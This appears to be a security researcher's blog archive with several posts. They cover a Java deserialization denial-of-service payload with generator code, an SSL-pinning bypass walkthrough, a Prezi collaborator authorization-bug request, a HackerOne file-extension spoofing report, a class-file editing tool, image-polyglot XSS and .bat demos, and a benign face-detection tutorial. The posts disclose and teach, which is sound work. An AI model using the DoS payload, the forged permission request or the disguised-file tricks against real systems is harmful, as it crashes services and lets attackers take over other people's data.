Tuesday, February 19, 2019

DOS Payload (works on latest JRE) for Java Deserialization issue

Reading the below serialized payload by server using the latest JRE version (or older), can cause instant crash on server (StackOverflow error)

Payload:
https://github.com/csanuragjain/extra/blob/master/Deserialization%20issue/payloadNew.txt?raw=true

How is it created:

import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;


public class Payload2 {

/**
 * @param args
 * @throws Exception 
 */
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
        Set s= new HashSet<>();
        Set entry= new HashSet();
        s.add(entry);
        entry.add(entry);
        FileOutputStream fos = new FileOutputStream("payloadNew.txt");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(s);
        oos.flush();
}

}

What happens when server reads it:
Server crash with StackOverflow error

What Oracle has to say:
There is no default JEP 290 serial filter that applies to all RMI
applications and eliminates all issues.  It is up to the application
writer to choose the configuration that makes an application the safest
it can be (given it's deserializing untrusted data).  In the given
examples HashMap and HashSet could be blocked to eliminate that issue.

In short, Oracle asks to block both of these classes using the serial Filter.

My thoughts:
Not quite sure, why an internal loop is even allowed.
The best way to mitigate this issue is not to trust any user provided serialized data. But if you have to read it then you need to be aware about these issues and should completely block these classes atleast (Although i think some other payload will always come)

Let me know your thoughts...

Monday, January 28, 2019

ClassModifier : Utility to easily modify your Java class files

Modify your Java class files easy with an interactive GUI.

Since it is not possible to edit a class file directly, this tool changes the class file to Smali version which is editable. After making the required changes, this tool converts the modified Smali to the modified Class file.
Features:
  • Modify a given Java class file
  • Allows Pen-tester to verify if their java desktop application is safe from Auth bypass
  • Can help you change the logical behavior of a Jar file by modifying a class
  • You can override private methods, change access modifier for variables of a class using ClassModifier.
  • Many other possibilities....

Download ClassModifier:



How to Use:

java -jar ClassModifier.jar

Menu:

File
  1. Open class (CTRL+O)- Takes the input class which need to be modified
  2. Open Project (CTRL+P)– You can reopen the project created using this feature.
  3. Save & Convert (CTRL+S) – Saves & Convert the code to modified Class and Smali file
  4. Export Class (CTRL+E) – Export modified class
  5. Java 2 Smali Helper - Opens a tab where you can write any Java code which on saving will show its equivalent Smali code
  6. Smali 2 Java code - Opens a tab where you can write any Smali code which on saving will show its equivalent Java code
Edit
  1. Increase Code FontSize (CTRL+I) – Allows you to increase font size of shown code.
  2. Decrease Code FontSize (CTRL+D) – Allows you to decrease the font size of shown code.
  3. Remove all tabs – Removes all currently shown tabs.
Decompiler
  1. Change Decompiler – Allows you to switch between jadx and jd-cli decompilers.

Help
  1. Update Software – Helps you to update the current software if any update is available
  2. How to use Class Modifier– Contains the documentation of this tool

Toolbar
  1. Allows you to find in current code/replace/replaceAll/find all class

ClassModifier_lib Folder

  1. It comes along with the software
  2. Contains the helper jars used by program
  3. ClassModifier_lib\userLibrary is automatically added in classpath while compiling code. If you wish to compile your code using external jars then place those external jars inside ClassModifier_lib\userLibrary

How to Use:
  • Open the Java class to be Modified
  • On opening, ClassModifier will open the Smali version of the class file
  • Edit the smali file and make the required changes
  • Save the smali file 
  • Modified java class file will be created which can be anytime exported using the File -> Export Class button.
  • Since Smali editing can be difficult, 2 options are provided - Java 2 Smali Helper and vice-versa.
  • As name suggests, Java 2 Smali Helper lets you see the Smali equivalent code for the input Java code.
  • Similarly, Smali 2 Java Helper lets you see the Java equivalent code for the input Smali code.

Screenshot:




Note: This software is meant for educational purpose only. Don't use it for any illegal activity.

Friday, November 16, 2018

Spoofing file extensions on HackerOne

While testing HackerOne, I observed an issue with the file upload functionality. It seems that on File upload, the uploader uses the content within the file for determining the content type of file instead of filetype .

Although this does not pose much of a risk since the changed extensions would be visible at download time but wanted to blog about this.

This raises below 2 scenario:

Scenario 1


  • Open the batch.cmd on the posted comment
  • Observe an image gets represented and their is no warning from HackerOne

  • User downloads the file, thinking of it as an image file 
  • if the user accidentally ignores the downloaded file extensions opens it then malicious batch file gets executed



Scenario 2 


  • Open the myFile.txt on the posted comment
  • You will see a warning from Hackerone, but since the file is txt file so user might just go ahead 

  • User downloads the file, thinking of it as an text file

  • if the user accidentally ignores the downloaded file extensions opens it then malicious HTML scripts execute


Reason:

  1. Content-Disposition: attachment; filename="" in response from hackerone-attachments.s3.amazonaws.com does not contain filename, forcing browser to decide the naming convention. 
  2. Since the Content type got decided on basis of file content header instead of extension by HackerOne so few browser would simply save it on user computer with incorrect extension, which caused the above Scenarios 1 and 2
HackerOne Report:
https://hackerone.com/reports/268123 (Closed as Informative)

Saturday, November 3, 2018

SSL Pinning bypass on Android Emulator

Recently I developed interest in analyzing the Android apk network traffic.

I was able to capture traffic using HTTP interceptor for some of the apk but many other apk started giving error in interceptor - "The client failed to negotiate SSL connection".

On searching this issue, I came to know that apk are performing SSL pinning. In order to capture traffic for these apk, I need to bypass the SSL pinning. After reading multiple articles, I founded this easy way of performing the same.

Requirements:

  1. Burp Suite - https://portswigger.net/burp/communitydownload
  2. XPosed apk framework: https://forum.xda-developers.com/showthread.php?t=3034811
  3. JustTrustMe - https://github.com/Fuzion24/JustTrustMe/releases
  4. Memu Android emulator - https://www.memuplay.com/


Steps:

Configuring Burp Suite:

  1. Install Burp Suite from https://portswigger.net/burp/communitydownload
  2. Follow all steps mentioned at https://support.portswigger.net/customer/portal/articles/1816883-getting-started-with-burp-suite
  3. For our case, we are setting Burp to listen to all interfaces on 8085 port




XPosed apk framework:

  1. Download the framework from https://forum.xda-developers.com/showthread.php?t=3034811
  2. For my case the download link was https://forum.xda-developers.com/attachment.php?attachmentid=4393082&d=1516301692









JustTrustMe apk:

  1. Download the apk from https://github.com/Fuzion24/JustTrustMe/releases
  2. For my case it came out to be https://github.com/Fuzion24/JustTrustMe/releases/download/v.2/JustTrustMe.apk



Memu Android emulator :

  • Download the emulator from https://www.memuplay.com/ 

  • Install the emulator and open the same.

  • Click on Settings button and then goto Others tab

  • Click on Enable for Root mode option

  • Restart the emulator
  • Click on "Install APK" button on the right side toolbar of Memu emulator

  • Choose Xposed apk framework which was downloaded earlier
  • Open the apk after installation
  • Click on Install/Update option inside the apk
  • After the installation is complete, restart the emulator
  • If all went well, you will see something as shown below in screenshot

  • Again, click on "Install APK" button on the right side toolbar of Memu emulator
  • Choose JustTrustMe apk which was downloaded earlier
  • After JustTrustMe is installed, open Xposed apk
  • Open the Modules tab

  • Activate the JustTrustMe module by ticking the checkbox

  • Now, goto Wifi->Settings in the emulator
  • Long press on the wifi name till you see option to Modify network

  • Click on Advanced option
  • Mention the ip of your system and port as 8085 (as Burp is listening on this port)

  • Open any apk on the emulator which has SSL pinning enabled
  • Observe that Burp suite is capturing all traffic and stops giving SSL error.


Note:
This post is only for educational purpose. Don't use this for any unauthorized activities.

Hope this helps.

Monday, September 18, 2017

Authorization bug which I discovered in Prezi

Prezi allows you to create cool presentation, which you can later share with your audience. It also allows you to add collaborator who can assist in your presentation creation
I started testing Prezi for security vulnerabilities (bugbounty.prezi.com) and found an Authorization bug which allowed me to Add/Delete/Modify Collaborator for any public prezi which were not even mine.

Vulnerable Request:
While adding collaborator to your prezi presentation, below PUT request is fired
PUT /api/v1/share/<presentation_id>/permissions/ HTTP/1.1
Host: prezi.com
Connection: close
Content-Length: 60
User-Agent: <User agent string>
Origin: https://prezi.com
x-csrftoken: <csrf_token>
content-type: application/json
Accept: */*
Referer: https://prezi.com/dashboard/next/
Accept-Language: en-US,en;q=0.8
Cookie: <Cookie for attacker@gmail.com>

{"email":"attackerNewIdOrRealCollaborator@gmail.com","permission":"viewer"}

Explanation of above request:
1) <presentation_id> is Victim’s presentation
2) attacker@gmail.com: Attacker who is firing the above request
3) attackerNewIdOrRealCollaborator@gmail.com: It can be either Attacker id or a genuine collaborator of this presentation with editor rights.

What happens:
1) If Attacker used his own id in the body parameter, then he would become part of the presentation <presentation_id> without victim permission.
2) If Attacker used a genuine collaborator id having editor rights, then after firing this request, the collaborator permission would lower from editor to viewer only
3) If Attacker, simply changes the above request header from PUT to delete then any collaborator (except owner) passed within body parameter would get deleted from that presentation
4) This attack worked only for public prezis (and not for private prezis) because they are somewhat special - everyone has view permissions by default, although they are not collaborators of it (people who are explicitly added to view/edit the prezi). The vulnerable endpoint unfortunately considered this "default view permission" as a "collaborator permission", which allowed you to add anyone else as a view collaborator. This "collaborator privilege" enabled you to lower the existing collaborators' permission to view level by re-adding them.



I reported the same to Prezi which was fixed fast and Prezi rewarded a nice bounty :)

Sunday, July 23, 2017

Facial Detection using Java

In this post, we will learn how to extract faces out of an image from webcam. We will make use of 2 library which are sarxos and openimaj

Language Used:
Java

Git Repo:
https://github.com/csanuragjain/extra/tree/master/FaceRecognition

Website:
https://cooltrickshome.blogspot.com/2017/07/facial-recognition-using-java.html

Pom Dependency:
 <dependency>  
   <groupId>org.openimaj</groupId>  
   <artifactId>image-feature-extraction</artifactId>  
   <version>1.3.5</version>  
 </dependency>  
 <dependency>  
      <artifactId>faces</artifactId>  
      <groupId>org.openimaj</groupId>  
      <version>1.3.5</version>  
      <scope>compile</scope>  
 </dependency>  
 <dependency>  
        <groupId>com.github.sarxos</groupId>  
        <artifactId>webcam-capture</artifactId>  
        <version>0.3.11</version>  
        <scope>test</scope>  
   </dependency>  

Reference:
https://cooltrickshome.blogspot.com/2016/11/take-snapshot-from-webcam-using-java-in.html
http://openimaj.org/

Program:

FaceDetector.java

Variables:
      private static final long serialVersionUID = 1L;  
      private static final HaarCascadeDetector detector = new HaarCascadeDetector();  
      private Webcam webcam = null;  
      private BufferedImage img= null;  
      private List<DetectedFace> faces = null;  


main method:
 public static void main(String[] args) throws IOException {  
           new FaceDetector().detectFace();  
      }  

How it works:
1) We create an object of FaceDetector class which class the default constructor and then we call the detectFace method of this class.

FaceDetector constructor:
      public FaceDetector() throws IOException {  
           webcam = Webcam.getDefault();  
           webcam.setViewSize(WebcamResolution.VGA.getSize());  
           webcam.open(true);  
           img=webcam.getImage();  
           webcam.close();  
           ImagePanel panel=new ImagePanel(img);  
           panel.setPreferredSize(WebcamResolution.VGA.getSize());  
           add(panel);  
           setTitle("Face Recognizer");  
           setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);  
           pack();  
           setLocationRelativeTo(null);  
           setVisible(true);  
      }  

How it works:
1) We use the sarxos library for webcam here
2) We create a webcam object and set the viewsize
3) We open the webcam using the open method
4) We take the image from webcam and store it into a BufferedImage object named img
5) Now we close the webcam and pass the image obtained in ImagePanel class which would then be added to Frame.
6) Now we show the frame to user with the webcam image which will be processed.

detectFace method:
      public void detectFace(){  
           JFrame fr=new JFrame("Discovered Faces");  
           faces = detector.detectFaces(ImageUtilities.createFImage(img));  
           if (faces == null) {  
                System.out.println("No faces found in the captured image");  
                return;  
           }  
           Iterator<DetectedFace> dfi = faces.iterator();  
           while (dfi.hasNext()) {  
                DetectedFace face = dfi.next();  
                FImage image1 = face.getFacePatch();  
                ImagePanel p=new ImagePanel(ImageUtilities.createBufferedImage(image1));  
                fr.add(p);  
           }  
           fr.setLayout(new FlowLayout(0));  
           fr.setSize(500,500);  
           fr.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);  
           fr.setVisible(true);  
      }  

How it works:
1) We use the openimaj library for face detection
2) We create a new Frame which would be showing up the results.
3) We make use of detectFaces method of HaarCascadeDetector class object detector, passing the image to be processed. ImageUtilities is used to create FImage out of BufferedImage.
4) If no face is found on image then an error message is returned.
5) Otherwise, we iterate through each face and retrieve the faces using getFacePatch method.
6) Again we use the createBufferedImage method of ImageUtilities class to get a BufferedImage out of FImage.
7) We add all the faces to the resulting frame.

ImagePanel Class:
 package com.cooltrickshome;  
 import java.awt.Dimension;  
 import java.awt.Graphics;  
 import java.awt.Image;  
 import javax.swing.ImageIcon;  
 import javax.swing.JPanel;  
 class ImagePanel  
  extends JPanel  
 {  
  private Image img;  
  public ImagePanel(String img)  
  {  
   this(new ImageIcon(img).getImage());  
  }  
  public ImagePanel(Image img)  
  {  
   this.img = img;  
   Dimension size = new Dimension(img.getWidth(null), img.getHeight(null));  
   setPreferredSize(size);  
   setMinimumSize(size);  
   setMaximumSize(size);  
   setSize(size);  
   setLayout(null);  
  }  
  public void paintComponent(Graphics g)  
  {  
   g.drawImage(this.img, 0, 0, null);  
  }  
 }  

How it works:
1) This is used to show the image over a panel

Output:


Full Program:


FaceDetector.java
 package com.cooltrickshome;  
 /**  
  * Reference:  
  * https://github.com/sarxos/webcam-capture/tree/master/webcam-capture-examples/webcam-capture-detect-face  
  * http://openimaj.org/  
  */  
 import java.awt.FlowLayout;  
 import java.awt.image.BufferedImage;  
 import java.io.IOException;  
 import java.util.Iterator;  
 import java.util.List;  
 import javax.swing.JFrame;  
 import org.openimaj.image.FImage;  
 import org.openimaj.image.ImageUtilities;  
 import org.openimaj.image.processing.face.detection.DetectedFace;  
 import org.openimaj.image.processing.face.detection.HaarCascadeDetector;  
 import com.github.sarxos.webcam.Webcam;  
 import com.github.sarxos.webcam.WebcamResolution;  
 public class FaceDetector extends JFrame {  
      private static final long serialVersionUID = 1L;  
      private static final HaarCascadeDetector detector = new HaarCascadeDetector();  
      private Webcam webcam = null;  
      private BufferedImage img= null;  
      private List<DetectedFace> faces = null;  
      public FaceDetector() throws IOException {  
           webcam = Webcam.getDefault();  
           webcam.setViewSize(WebcamResolution.VGA.getSize());  
           webcam.open(true);  
           img=webcam.getImage();  
           webcam.close();  
           ImagePanel panel=new ImagePanel(img);  
           panel.setPreferredSize(WebcamResolution.VGA.getSize());  
           add(panel);  
           setTitle("Face Recognizer");  
           setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);  
           pack();  
           setLocationRelativeTo(null);  
           setVisible(true);  
      }  
      public void detectFace(){  
           JFrame fr=new JFrame("Discovered Faces");  
           faces = detector.detectFaces(ImageUtilities.createFImage(img));  
           if (faces == null) {  
                System.out.println("No faces found in the captured image");  
                return;  
           }  
           Iterator<DetectedFace> dfi = faces.iterator();  
           while (dfi.hasNext()) {  
                DetectedFace face = dfi.next();  
                FImage image1 = face.getFacePatch();  
                ImagePanel p=new ImagePanel(ImageUtilities.createBufferedImage(image1));  
                fr.add(p);  
           }  
           fr.setLayout(new FlowLayout(0));  
           fr.setSize(500,500);  
           fr.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);  
           fr.setVisible(true);  
      }  
      public static void main(String[] args) throws IOException {  
           new FaceDetector().detectFace();  
      }  
 }  

ImagePanel.java
 package com.cooltrickshome;  
 import java.awt.Dimension;  
 import java.awt.Graphics;  
 import java.awt.Image;  
 import javax.swing.ImageIcon;  
 import javax.swing.JPanel;  
 class ImagePanel  
  extends JPanel  
 {  
  private Image img;  
  public ImagePanel(String img)  
  {  
   this(new ImageIcon(img).getImage());  
  }  
  public ImagePanel(Image img)  
  {  
   this.img = img;  
   Dimension size = new Dimension(img.getWidth(null), img.getHeight(null));  
   setPreferredSize(size);  
   setMinimumSize(size);  
   setMaximumSize(size);  
   setSize(size);  
   setLayout(null);  
  }  
  public void paintComponent(Graphics g)  
  {  
   g.drawImage(this.img, 0, 0, null);  
  }  
 }  

Hope it helps :)

Friday, July 21, 2017

Some Image Based Exploits with their Prevention

Images can be used to run malicious scripts over browser and can also be used to download Trojans if not handled carefully by your website. Too much trust on user input can cause damage to your clients.

In this post, we will run malicious scripts using a simple image viewer functionality and lastly we will discuss on how we can resolve this.

Programming Language
HTML, PHP

Git Repository
https://github.com/csanuragjain/extra/tree/master/ImageExploit

Website
https://cooltrickshome.blogspot.in/2017/07/some-image-based-exploits-with-their.html

One of Image Vulnerability I reported:
https://hackerone.com/reports/221928

Scenario #1:
In this scenario, we will show how lacking Content-Type while displaying images can run malicious scripts.
 Malicious Image




















Description
1)  Right Click on above Image and then Choose Save Image As
2) Name it as exifxss.jpg and Save it.
3) Otherwise you can also get it from the git location.

showImage.php
 <?php  
 include('exifxss.jpg');  
 ?>  


Description
A simple php file which would be showing the above jpg file.

Output:
  1. When you access showImage.php on your browser, you will expect to see the image but instead you will see several pop up coming up.
  2. This happens since the php page is not setting the Content-Type which makes php show image as an HTML. Since Image has several alert messages so they start popping up.
  3. showImage.php need to make sure that it sets the correct Content-Type and also make sure that it does not set the user provided Content-Type.


Scenario #2:
In this scenario, we will show how simple looking image when downloaded can become an exploit.
Caution: This will run notepad, calc, msconfig, services.msc on your computer, although it won't perform anything malicious.

Malicious Image











Description
1)  Right Click on above Image and then Choose Save Image As
2) Name it as exifxss.bat and Save it.
3) Otherwise you can also get it from the git location.

showImage2.html
 <img src="image.bat" width=500 height=500/>  

Description
A simple HTML file showing the image image.bat

Output:

  1. On accessing the above HTML, you would see the bugs bunny image (nothing suspicious)
  2. Now right click on Image and save the image. It would be saved as image.bat
  3. On opening it the malicious payload gets executed opening up notepad, services.msc, msconfig, calc.
  4. To prevent it, make sure that users are never allowed to store any non image extension file.
Please let me know your suggestions and comments.
Hope it helps :)